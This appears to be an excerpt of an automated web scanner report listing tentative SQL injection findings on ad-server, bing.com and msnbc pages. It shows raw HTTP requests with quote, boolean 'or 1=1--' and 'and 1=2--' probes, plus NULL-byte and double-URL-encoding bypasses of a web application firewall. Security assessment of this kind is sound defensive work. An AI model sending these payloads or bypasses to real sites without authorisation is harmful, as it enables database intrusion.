The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /APM/iview/139941180/direct?1'=1 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Response 1
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 4790 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:51:49 GMT Connection: close
GET /APM/iview/139941180/direct?1''=1 HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Response 2
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 199 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:51:50 GMT Connection: close
The ;wi.728;hi.90/01?click parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ;wi.728;hi.90/01?click parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click=' HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response 1
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7022 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 17:22:07 GMT
The AA002 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the AA002 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click= HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607%00'; MUID=DC63BAA44C3843F38378B4BB213E0A6F
Response 1
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6607 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 17:22:10 GMT
The MUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the MUID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /APM/iview/148848786/direct HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527;
Response 1
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6497 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 18:57:20 GMT Connection: close
GET /APM/iview/148848786/direct HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F%2527%2527;
Response 2
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 1196 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 18:57:21 GMT Connection: close
The MUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /APM/iview/148848786/direct;;wi.728;hi.90/01?click= HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F%00'
Response 1
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7015 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 17:22:11 GMT
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /APM%2527/iview/148848786/direct HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Response 1
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6905 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 17:39:12 GMT Connection: close
GET /APM%2527%2527/iview/148848786/direct HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;
Response 2
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 1416 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 17:39:12 GMT Connection: close
<SCRIPT Language="Javascript"> var MPcode = "12760-79049-27909-2"; var MPwidth = "728"; var MPheight = "90"; var randNum = Math.floor(Math.random() * 10000000); var iframesrc = "http://altfarm.me ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /APM/iview/148848786/direct HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F; Referer: http://www.google.com/search?hl=en&q='
Response 1
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6417 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 17:39:10 GMT Connection: close
GET /APM/iview/148848786/direct HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F; Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 245 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 17:39:10 GMT Connection: close
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /APM/iview/148848786/direct HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F; Referer: http://www.google.com/search?hl=en&q=%2527
Response 1
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 6905 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:52:08 GMT Connection: close
GET /APM/iview/148848786/direct HTTP/1.1 Host: redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F; Referer: http://www.google.com/search?hl=en&q=%2527%2527
Response 2
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 1196 Content-Type: text/html Expires: 0 Connection: close Date: Sun, 30 Jan 2011 01:52:08 GMT Connection: close
1.102. http://www.bing.com/videos/browse [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.bing.com
Path:
/videos/browse
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /videos/browse?mkt=en-us&vid=&1'=1 HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /videos/results.aspx HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM; Referer: http://www.google.com/search?hl=en&q=%00'
The SRCHUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SRCHUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the SRCHUID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /videos/results.aspx HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7%2527; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /videos/results.aspx HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /videos/results.aspx?q= HTTP/1.1 Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527 Connection: close Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 19689523%20or%201%3d1--%20 and 19689523%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/21134540/vp/4132823919689523%20or%201%3d1--%20 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Cnection: close Expires: Sun, 30 Jan 2011 03:09:17 GMT Date: Sun, 30 Jan 2011 03:09:17 GMT Content-Length: 3959 Connection: close Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
GET /id/21134540/vp/4132823919689523%20or%201%3d2--%20 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Server: Microsoft-IIS/7.5 Pragma: no-cache Content-Type: text/html; charset=utf-8 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET RTSS: 1 Expires: Sun, 30 Jan 2011 03:09:17 GMT Date: Sun, 30 Jan 2011 03:09:17 GMT Content-Length: 4181 Connection: close Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /id/24780215%00'/ns/technology_and_science-games HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 X-Cnection: close Date: Sun, 30 Jan 2011 03:10:15 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 324
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>Bad Request</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii" ...[SNIP]... <h2>Bad Request - Invalid URL</h2> ...[SNIP]...
Request 2
GET /id/24780215%00''/ns/technology_and_science-games HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Server: Apache Content-Length: 246 Content-Type: text/html; charset=iso-8859-1 Date: Sun, 30 Jan 2011 03:10:15 GMT Connection: close Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /id/24780215%00''/ns/technology_and_science-games was ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/37643077'%20and%201%3d1--%20 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 01:59:30 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 111210
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:-1075847510 --> <title>Welcome to our new story pages - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/37643077" property="og:url" /><meta content="2010-06-11T17:41:17" property="og:updated" /><meta content="Welcome to our new story pages - msnbc.com" name="title" /><meta content="A tour of our new and improved pages " property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="Ashley Wells" property="og:author" /><meta content="Creative Director" property="og:job-title" /><meta content="/MSNBC/Sections/AboutUS/Guide%20to%20new%20story%20pages/Story%20page%20guides/Grabs/msnbc-old-page.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/MSNBC/Sections/AboutUS/Guide to new story pages/Story page guides/Grabs/msnbc-old-page.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="noindex" name="robots" /><meta content="We've made some exciting improvements to our story pages to better showcase video and pictures and make it easier for users to discover related content and join the discussion. " name="description" property="og:description" /><meta content="Fri, 11 Jun 2010 17:41:17 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/37643077" /> <link href="http://assets1b.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>
GET /id/37643077'%20and%201%3d2--%20 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 01:59:31 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 111118
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:129150931 --> <title>Welcome to our new story pages - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/37643077" property="og:url" /><meta content="2010-06-11T17:41:17" property="og:updated" /><meta content="Welcome to our new story pages - msnbc.com" name="title" /><meta content="A tour of our new and improved pages " property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="Ashley Wells" property="og:author" /><meta content="Creative Director" property="og:job-title" /><meta content="/MSNBC/Sections/AboutUS/Guide%20to%20new%20story%20pages/Story%20page%20guides/Grabs/msnbc-old-page.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/MSNBC/Sections/AboutUS/Guide to new story pages/Story page guides/Grabs/msnbc-old-page.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="noindex" name="robots" /><meta content="We've made some exciting improvements to our story pages to better showcase video and pictures and make it easier for users to discover related content and join the discussion. " name="description" property="og:description" /><meta content="Fri, 11 Jun 2010 17:41:17 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/37643077" /> <link href="http://assets1d.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>
1.110. http://www.msnbc.redacted/id/37643077 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.msnbc.redacted
Path:
/id/37643077
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/37643077?1'%20and%201%3d1--%20=1 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 03:08:50 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 111209
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:-1075847506 --> <title>Welcome to our new story pages - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/37643077" property="og:url" /><meta content="2010-06-11T17:41:17" property="og:updated" /><meta content="Welcome to our new story pages - msnbc.com" name="title" /><meta content="A tour of our new and improved pages " property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="Ashley Wells" property="og:author" /><meta content="Creative Director" property="og:job-title" /><meta content="/MSNBC/Sections/AboutUS/Guide%20to%20new%20story%20pages/Story%20page%20guides/Grabs/msnbc-old-page.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/MSNBC/Sections/AboutUS/Guide to new story pages/Story page guides/Grabs/msnbc-old-page.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="noindex" name="robots" /><meta content="We've made some exciting improvements to our story pages to better showcase video and pictures and make it easier for users to discover related content and join the discussion. " name="description" property="og:description" /><meta content="Fri, 11 Jun 2010 17:41:17 GMT" name="Search.Update" /> <link rel="canonical" href="http://www.msnbc.redacted/id/37643077" /> <link href="http://assets1a.msnbc.redacted/rendering/msnbc/html40/assets/img/apple-touch-icon.png" rel="apple-touch-icon"/>
GET /id/37643077?1'%20and%201%3d2--%20=1 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Powered-By: ASP.NET X-Cnection: close Date: Sun, 30 Jan 2011 03:08:51 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 111117
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:v= ...[SNIP]... <!-- RA:490236434 --> <title>Welcome to our new story pages - msnbc.com</title>
<meta name="generator" content="SkyPad Rendering" /> <meta content="text/html; charset=UTF-8" http-equiv="content-type"/> <meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" /> <meta name="viewport" content="width = 1020"/> <meta content="http://www.msnbc.redacted/id/37643077" property="og:url" /><meta content="2010-06-11T17:41:17" property="og:updated" /><meta content="Welcome to our new story pages - msnbc.com" name="title" /><meta content="A tour of our new and improved pages " property="og:title" /><meta content="msnbc.com" property="og:site_name" /><meta content="article" property="og:type" /><meta content="Ashley Wells" property="og:author" /><meta content="Creative Director" property="og:job-title" /><meta content="/MSNBC/Sections/AboutUS/Guide%20to%20new%20story%20pages/Story%20page%20guides/Grabs/msnbc-old-page.jpg" name="Search.Image" /><meta content="http://msnbcmedia3.redacted/j/MSNBC/Sections/AboutUS/Guide to new story pages/Story page guides/Grabs/msnbc-old-page.standard.jpg" property="og:image" /><meta content="23294612872" property="fb:page_id" /><meta content="noindex" name="robots" /><meta content="We've made some exciting improvements to our story pages to better showcase video and pictures and make it easier for users to discover related content and join the 